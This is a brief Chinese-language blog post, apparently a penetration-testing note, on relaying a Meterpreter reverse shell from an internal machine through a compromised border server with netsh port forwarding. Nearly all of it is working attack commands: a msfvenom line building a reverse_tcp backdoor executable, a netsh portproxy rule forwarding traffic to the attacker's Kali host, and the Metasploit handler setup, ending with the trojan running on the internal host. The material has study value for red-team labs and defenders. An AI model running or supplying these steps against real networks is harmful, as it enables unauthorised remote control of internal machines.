netsh端口转发监听meterpreter

Posted 2022-02-02 「已注销」

netsh端口转发监听meterpreter

模拟环境

在服务器B上可以通过设置代理访问C服务器，如果拿到C服务器的权限，通常是生成正向后门，然后kali的MSF可以正向连接(bind)到B服务器,由此得到meterpreter进行后面的操作;如果服务器C上有防火墙拦截，kali的MSF不能正向连接上后门，那就需要生成反向的代理连接(reverse)到服务器B上，在服务器A上在通过端口映射或者转发给kali

实际操作

MSF生成后门

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.12 lport=5555 -f exe -o rev-tcp.exe

 

边界服务器

netsh interface portproxy add v4tov4 listenport=5555 connectaddress=192.168.44.128 connectport=6666

 

MSF开启监听

set payload windows/meterpreter/reverse_tcp
set lhost 192.168.44.128
set lport 6666
exploit -j -z

 

内网机器运行木马上线